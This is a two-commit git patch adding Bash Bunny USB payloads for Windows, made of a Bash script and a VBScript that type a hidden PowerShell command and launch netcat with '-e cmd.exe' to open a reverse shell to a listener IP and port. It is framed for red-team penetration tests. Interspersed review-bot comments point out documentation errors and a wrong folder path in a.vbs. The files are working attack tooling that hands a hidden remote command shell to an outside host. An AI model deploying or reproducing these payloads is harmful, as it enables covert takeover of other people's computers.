From c699fb6b72f05e32298e8f1495f9414a11cfc0f3 Mon Sep 17 00:00:00 2001
From: ralphyz
Date: Fri, 10 Mar 2017 15:55:23 -0500
Subject: [PATCH 1/2] Add files via upload

A simple script to create a netcat reverse shell. For Red Teamers - you can auto_increment the listener port by setting a flag to true in payload.txt. netcat.exe is not included and must be sourced elsewhere.
---
 .../library/RAZ_ReverseShell/listener_ip.txt | 1 +
 .../RAZ_ReverseShell/listener_port.txt | 1 +
 payloads/library/RAZ_ReverseShell/payload.txt | 75 +++++++++++++++++++
 3 files changed, 77 insertions(+)
 create mode 100644 payloads/library/RAZ_ReverseShell/listener_ip.txt
 create mode 100644 payloads/library/RAZ_ReverseShell/listener_port.txt
 create mode 100644 payloads/library/RAZ_ReverseShell/payload.txt

diff --git a/payloads/library/RAZ_ReverseShell/listener_ip.txt b/payloads/library/RAZ_ReverseShell/listener_ip.txt
new file mode 100644
index 00000000..b1c12741
--- /dev/null
+++ b/payloads/library/RAZ_ReverseShell/listener_ip.txt
@@ -0,0 +1 @@
+192.168.1.100
\ No newline at end of file
diff --git a/payloads/library/RAZ_ReverseShell/listener_port.txt b/payloads/library/RAZ_ReverseShell/listener_port.txt
new file mode 100644
index 00000000..1b824382
--- /dev/null
+++ b/payloads/library/RAZ_ReverseShell/listener_port.txt
@@ -0,0 +1 @@
+4444
\ No newline at end of file
diff --git a/payloads/library/RAZ_ReverseShell/payload.txt b/payloads/library/RAZ_ReverseShell/payload.txt
new file mode 100644
index 00000000..8b71a3d0
--- /dev/null
+++ b/payloads/library/RAZ_ReverseShell/payload.txt
@@ -0,0 +1,75 @@ +#!/bin/bash +# +# Title: RAZ_ReverseShell +# Author: RalphyZ +# Version: 1.0 +# Target: Windows 7+ +# Dependencies: The following files must exist in the switch folder: +# nc.exe - Windows binary for netcat with the -e flag +# listener_port.txt - The Port number for the netcat listener +# listener_ip.txt - The IP Address for the netcat listener +# +# Description: Executes a netcat reverse cmd shell at a given IP and Port +# Intentionally, this script leaves a trace in the Run Box +# +# Colors: +# Green.....................Working +# White.....................Completed without error +# White (blinking)..........Incrementing the port in listener_port.txt +# Blue (blinking)...........listener_port.txt was not found +# Light-Blue (blinking).....listener_ip.txt was not found +# Amber (blinking)..........nc.exe was not found + + +# Change this if you want to enable auto_increment of the netcat port +# If true, the port number is increased by 1 everytime the script runs +# This is good for Red Teams doing PenTesting on multiple computers +auto_increment=false + +LED G +ATTACKMODE HID STORAGE + +LANGUAGE='us' + +# Get the switch position +source bunny_helpers.sh + + +# Check for all the files - error if not found. If found, put into variables +if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/listener_port.txt" ] ; then + LED B 100 + exit 1 +else + my_port=`cat /root/udisk/payloads/${SWITCH_POSITION}/listener_port.txt` +fi + +if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/listener_ip.txt" ] ; then + LED B G 100 + exit 1 +else + my_ip=`cat /root/udisk/payloads/${SWITCH_POSITION}/listener_ip.txt` +fi + +if [ ! 
-f "/root/udisk/payloads/${SWITCH_POSITION}/nc.exe" ] ; then + LED R G 100 + exit 1 +fi + +# Execute the powershell command in the run box with the appropriate variables +QUACK GUI r +QUACK DELAY 100 +QUACK STRING powershell -WindowStyle Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\nc.exe') -nv ${my_ip} ${my_port} -e cmd.exe" +QUACK ENTER + +# If auto_increment, then update the listener_port file +if [ "$auto_increment" = true ] ; then + LED R G B 100 + echo $((my_port + 1)) > /root/udisk/payloads/${SWITCH_POSITION}/listener_port.txt + + # Allow the write to sync to the USB + sleep 1 +fi + +# Signal everything went OK - white +LED R G B +exit 0 From 938be26260eccb12df959e3c30585817c25365f0 Mon Sep 17 00:00:00 2001 From: ralphyz Date: Fri, 10 Mar 2017 19:51:19 -0500 Subject: [PATCH 2/2] RAZ_VBScript This payload executes a VBScript as the payload. The sample VBScript creates a netcat reverse shell, but any VBScript can be substituted. netcat.exe must be sourced elsewhere. --- payloads/library/RAZ_VBScript/a.vbs | 162 ++++++++++++++++++ payloads/library/RAZ_VBScript/listener_ip.txt | 1 + .../library/RAZ_VBScript/listener_port.txt | 1 + payloads/library/RAZ_VBScript/payload.txt | 35 ++++ 4 files changed, 199 insertions(+) create mode 100644 payloads/library/RAZ_VBScript/a.vbs create mode 100644 payloads/library/RAZ_VBScript/listener_ip.txt create mode 100644 payloads/library/RAZ_VBScript/listener_port.txt create mode 100644 payloads/library/RAZ_VBScript/payload.txt diff --git a/payloads/library/RAZ_VBScript/a.vbs b/payloads/library/RAZ_VBScript/a.vbs new file mode 100644 index 00000000..fd1a23a6 --- /dev/null +++ b/payloads/library/RAZ_VBScript/a.vbs 
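Review bot: The header line `# Intentionally, this script leaves a trace in the Run Box` never says what the trace is, so a reader cannot tell which artifact to expect; from the body it is the full `powershell -WindowStyle Hidden ...` command line typed by `QUACK STRING`, which is what the Run dialog's history keeps. Expanding the comment to something like `# Intentionally leaves a trace: the typed powershell command line stays in the Run dialog history` makes that explicit for anyone reviewing or detecting this payload in a lab. In the same header, `everytime` should be `every time`.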
@@ -0,0 +1,162 @@ +Option Explicit + +'============================================================================== +' Title: a.vbs +' Author: RalphyZ +' Version: 1.0 +' Target: Windows 7+ +' +' Description: +' This VBScript is used by a BashBunny payload to +' to create a netcat reverse shell. The netcat listener +' IP Address and Port are stored in separate files - so that +' Red Teams can quickly change information. The "IncrementPort" +' subroutine will increase the port number by 1 every time the +' script is called. This is so that you can start multiple +' listeners while doing a PenTest, and grab multiple reverse +' shells in one trip. Uncomment that if you want the auto-increment +' +' Note: You must put the netcat executable in the strReverseShellPath directory +'============================================================================== + +' Declare Constants +Const ForReading = 1 +Const ForWriting = 2 + +' Declare Global Variables +Dim strListenerPort, strNewListenerPort, strListenerIP +Dim objFSO, objFile, strCurrentDirectory +Dim strNetCatEXE, strReverseShellPath, strListnerPortFile, strListenerIPFile + +' The netcat executable name +strNetCatEXE = "nc.exe" + +' The folder location +strReverseShellPath = "\payloads\library\RAZ_ReverseShell\" + +' The file containing the listener port +strListnerPortFile = "listener_port.txt" + +' The file containing the listener ip address +strListenerIPFile = "listener_ip.txt" + +' Create a File System Object +Set objFSO = CreateObject("Scripting.FileSystemObject") + +strCurrentDirectory = FindCurrentDirectory() + +' Read the Host IP Address (where the listener resides) +ReadHostIP + +' Read the listener port +ReadPort + +' Increment the listener port - for multiple shells +' Great for Red Teams +'IncrementPort + +' Start NetCat Reverse Shell +StartNetCat + +'============================================================================== +' Name: FindCurrentDirectory +' Arguments: None +' Return Value: None +' 
Description: Find the netcat executable +'============================================================================== +Function FindCurrentDirectory + Dim objDrives, d + + ' Set default return value + FindCurrentDirectory = "" + + ' Search all drives for the netcat exe + Set objDrives = objFSO.Drives + For Each d in objDrives + If (objFSO.FileExists(d + strReverseShellPath + strNetCatEXE)) Then + FindCurrentDirectory = d + strReverseShellPath + End if + Next +End Function + +'============================================================================== +' Name: ReadHostIP +' Arguments: None +' Return Value: None +' Description: Read the listener IP +'============================================================================== +Sub ReadHostIP() + ' Opens the file for reading + Set objFile = objFSO.OpenTextFile(strCurrentDirectory + strListenerIPFile , ForReading) + + ' Read the host IP + strListenerIP = objFile.ReadAll + + ' Close the file + objFile.Close +End Sub + + +'============================================================================== +' Name: ReadPort +' Arguments: None +' Return Value: None +' Description: Read the listener port +'============================================================================== +Sub ReadPort() + ' Opens the file for reading + Set objFile = objFSO.OpenTextFile(strCurrentDirectory + strListnerPortFile , ForReading) + + ' Read the listener port + strListenerPort = objFile.ReadAll + + ' Close the file + objFile.Close +End Sub + +'============================================================================== +' Name: IncrementPort +' Arguments: None +' Return Value: None +' Description: Read the listener port, increment the counter by 1, and write +' the new value +'============================================================================== +Sub IncrementPort() + ' Increment the listener port + strNewListenerPort = strListenerPort + 1 + + ' Open the file that contains the listener port for writing + Set objFile = 
objFSO.OpenTextFile(strCurrentDirectory + strListnerPortFile , ForWriting) + + ' Write the new (incremented) port + objFile.WriteLine strNewListenerPort + + ' Close the file + objFile.Close +End Sub + +'============================================================================== +' Name: StartNetCat +' Arguments: None +' Return Value: None +' Description: Start netcat on the appropriate port +'============================================================================== +Sub StartNetCat() + Dim strNetCat, strCommand, objShell + + ' Build the path to the netcat executable + strNetCat = objFSO.BuildPath(strCurrentDirectory, strNetCatEXE) + + ' Create the command string to run netcat on the correct ip and port, + ' and serve cmd.exe to the listener + strCommand = strNetCat + " -nv " + strListenerIP + " " + strListenerPort + " -e cmd.exe" + + ' Create the WScript Shell object + Set objShell = WScript.CreateObject ("WScript.Shell") + + ' Run the command (' , 0'= hidden) + objShell.run strCommand, 0 + + ' Free the object from memory + Set objShell = Nothing +End Sub \ No newline at end of file diff --git a/payloads/library/RAZ_VBScript/listener_ip.txt b/payloads/library/RAZ_VBScript/listener_ip.txt new file mode 100644 index 00000000..b1c12741 --- /dev/null +++ b/payloads/library/RAZ_VBScript/listener_ip.txt @@ -0,0 +1 @@ +192.168.1.100 \ No newline at end of file diff --git a/payloads/library/RAZ_VBScript/listener_port.txt b/payloads/library/RAZ_VBScript/listener_port.txt new file mode 100644 index 00000000..1b824382 --- /dev/null +++ b/payloads/library/RAZ_VBScript/listener_port.txt @@ -0,0 +1 @@ +4444 \ No newline at end of file diff --git a/payloads/library/RAZ_VBScript/payload.txt b/payloads/library/RAZ_VBScript/payload.txt new file mode 100644 index 00000000..b395f94f --- /dev/null +++ b/payloads/library/RAZ_VBScript/payload.txt 
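Review bot: `strReverseShellPath = "\payloads\library\RAZ_ReverseShell\"` points at the other payload's folder, so the listener_ip.txt and listener_port.txt added under RAZ_VBScript in this same commit are never read by a.vbs, and nc.exe is likewise expected under RAZ_ReverseShell; the header `' Note:` should say that all three files are resolved relative to strReverseShellPath, otherwise editing the RAZ_VBScript copies has no effect. The `' Return Value: None` line above FindCurrentDirectory is wrong for a Function that returns the matched folder or `""`; suggest `' Return Value: Folder containing strNetCatEXE on the first matching drive, or "" if none`. Note also that the loop in FindCurrentDirectory keeps overwriting the result, so the last matching drive wins, not the first; the comment should say whichever is intended.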
@@ -0,0 +1,35 @@ +#!/bin/bash +# +# Title: RAZ_VBScript +# Author: RalphyZ +# Version: 1.0 +# Target: Windows 7+ +# Dependencies: VBScript (a.vbs) in the switch folder with this file +# +# Description: Executes a VBScript, concealed in a hidden PowerShell window +# +# Colors: +# Green.....................Working +# White.....................Completed without error +# Light-Blue (blinking).....a.vbs was not found + +LED G +ATTACKMODE HID STORAGE + +# Get the switch position +source bunny_helpers.sh + +# Check if a.vbs is present +if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/a.vbs" ] ; then + LED B G 100 + exit 1 +fi + +# Run the VBScript +QUACK GUI r +QUACK DELAY 100 +QUACK STRING powershell -WindowStyle Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\a.vbs')" +QUACK ENTER + +# Green LED for finished +LED R G B \ No newline at end of file
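Review bot: The closing comment `# Green LED for finished` contradicts the file's own legend, where `LED R G B` is White (Completed without error) and Green means Working; change it to `# Signal everything went OK - white` to match RAZ_ReverseShell/payload.txt. The `# Dependencies:` line lists only a.vbs, but the a.vbs shipped in this commit hard-codes `\payloads\library\RAZ_ReverseShell\` for nc.exe and the listener txt files, so the header should list those as well (or state that a substituted VBScript defines its own dependencies).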